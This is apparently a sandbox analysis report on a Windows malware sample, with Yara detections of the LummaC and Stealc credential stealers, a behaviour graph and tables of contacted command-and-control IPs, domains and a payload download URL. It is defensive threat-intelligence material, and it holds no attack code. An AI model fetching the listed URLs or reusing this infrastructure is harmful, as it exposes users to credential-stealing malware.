Source: Yara match File source: 00000010.00000003.2786592123.000000000083D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2640348018.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2623251409.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2684577632.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2799731430.000000000083D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2603721155.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2641351631.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2604385825.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ea2c7beae0.exe PID: 1168, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ea2c7beae0.exe PID: 6376, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Credential Flusher
Source: Yara match File source: 00000015.00000002.2921279103.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 8X6R8OO7U6CNLMSAL.exe PID: 4192, type: MEMORYSTR
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: ea2c7beae0.exe PID: 1168, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ea2c7beae0.exe PID: 6376, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: 15.0.num.exe.650000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.num.exe.650000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.num.exe.650000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.num.exe.650000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.6a8d4317d4.exe.d20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.6a8d4317d4.exe.d20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.6a8d4317d4.exe.d20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.2900581975.0000000000651000.00000080.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2537460651.000000000095E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2654891019.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2881192763.0000000005160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.2678859508.0000000000651000.00000080.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2695730886.0000000000D21000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2864835627.0000000000D21000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.2883036920.0000000000651000.00000080.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2731328670.00000000011EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2695281635.000000000094B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2730538903.0000000000651000.00000080.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2904376187.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2496940953.0000000004C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.2821857520.0000000005490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2538148341.0000000000D21000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2867421028.000000000162B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 6a8d4317d4.exe PID: 5064, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 6a8d4317d4.exe PID: 5168, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 4144, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 6a8d4317d4.exe PID: 6996, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 2716, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1537094 Sample: h3yRbjNWk1.exe Startdate: 18/10/2024 Architecture: WINDOWS Score: 100 60 studennotediw.store 2->60 62 steamcommunity.com 2->62 64 8 other IPs or domains 2->64 78 Suricata IDS alerts for network traffic 2->78 80 Found malware configuration 2->80 82 Antivirus detection for URL or domain 2->82 84 19 other signatures 2->84 9 skotes.exe 3 25 2->9         started        14 ea2c7beae0.exe 3 2->14         started        16 h3yRbjNWk1.exe 5 2->16         started        18 5 other processes 2->18 signatures3 process4 dnsIp5 72 185.215.113.43, 49782, 49793, 49825 WHOLESALECONNECTIONSNL Portugal 9->72 74 185.215.113.103, 49799, 49830, 49864 WHOLESALECONNECTIONSNL Portugal 9->74 76 185.215.113.16, 49956, 80 WHOLESALECONNECTIONSNL Portugal 9->76 42 C:\Users\user\AppData\Local\Temp\...\num.exe, PE32 9->42 dropped 44 C:\Users\user\AppData\...\4af6eb3e1f.exe, PE32 9->44 dropped 46 C:\Users\user\AppData\...\ea2c7beae0.exe, PE32 9->46 dropped 58 5 other malicious files 9->58 dropped 112 Creates multiple autostart registry keys 9->112 114 Hides threads from debuggers 9->114 116 Injects a PE file into a foreign processes 9->116 118 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 9->118 20 4af6eb3e1f.exe 9 1 9->20         started        23 6a8d4317d4.exe 13 9->23         started        26 ea2c7beae0.exe 9->26         started        36 3 other processes 9->36 48 C:\...\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe, PE32 14->48 dropped 50 C:\...\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe, PE32 14->50 dropped 52 C:\Users\user\...\8X6R8OO7U6CNLMSAL.exe, PE32 14->52 dropped 120 Query firmware table information (likely to detect VMs) 14->120 122 Found many strings related to Crypto-Wallets (likely being stolen) 14->122 124 Tries to steal Crypto Currency Wallets 14->124 28 K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe 14->28         started        30 TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe 14->30         started        32 8X6R8OO7U6CNLMSAL.exe 14->32         started        54 C:\Users\user\AppData\Local\...\skotes.exe, PE32 16->54 dropped 56 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 16->56 dropped 126 Detected unpacking (changes PE section rights) 16->126 128 Tries to evade debugger and weak emulator (self modifying code) 16->128 130 Tries to detect virtualization through RDTSC time measurements 16->130 34 skotes.exe 16->34         started        132 Tries to harvest and steal ftp login credentials 18->132 134 Tries to harvest and steal browser information (history, passwords, etc) 18->134 136 Tries to detect sandboxes / dynamic malware analysis system (registry check) 18->136 file6 signatures7 process8 dnsIp9 86 Antivirus detection for dropped file 20->86 88 Multi AV Scanner detection for dropped file 20->88 90 Detected unpacking (changes PE section rights) 20->90 110 4 other signatures 20->110 66 185.215.113.37, 49856, 49953, 49988 WHOLESALECONNECTIONSNL Portugal 23->66 92 Hides threads from debuggers 23->92 94 Tries to detect sandboxes / dynamic malware analysis system (registry check) 23->94 96 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 23->96 68 sergei-esenin.com 104.21.53.8, 443, 49833, 49839 CLOUDFLARENETUS United States 26->68 70 steamcommunity.com 104.102.49.254, 443, 49823, 49890 AKAMAI-ASUS United States 26->70 98 Tries to detect sandboxes and other dynamic analysis tools (window names) 28->98 100 Binary is likely a compiled AutoIt script file 32->100 38 taskkill.exe 32->38         started        102 Machine Learning detection for dropped file 34->102 104 Contains functionality to inject code into remote processes 34->104 106 Tries to evade debugger and weak emulator (self modifying code) 34->106 108 Potentially malicious time measurement code found 34->108 signatures10 process11 process12 40 conhost.exe 38->40         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.43
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
104.21.53.8
 sergei-esenin.com United States
13335 CLOUDFLARENETUS true
185.215.113.37
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
104.102.49.254
 steamcommunity.com United States
16625 AKAMAI-ASUS true
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false
185.215.113.103
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false

Contacted Domains

Name IP Active
steamcommunity.com 104.102.49.254 true
sergei-esenin.com 104.21.53.8 true
eaglepawnoy.store unknown unknown
bathdoomgaz.store unknown unknown
spirittunek.store unknown unknown
licendfilteo.site unknown unknown
studennotediw.store unknown unknown
mobbipenju.store unknown unknown
clearancek.site unknown unknown
dissapoiznw.store unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.103/luma/random.exe false
    		unknown
    studennotediw.store true
      		unknown
      dissapoiznw.store true
        		unknown
        https://steamcommunity.com/profiles/76561199724331900 true
        • URL Reputation: malware
        		 unknown
        eaglepawnoy.store true
          		unknown
          http://185.215.113.37/ true
          • URL Reputation: malware
          		 unknown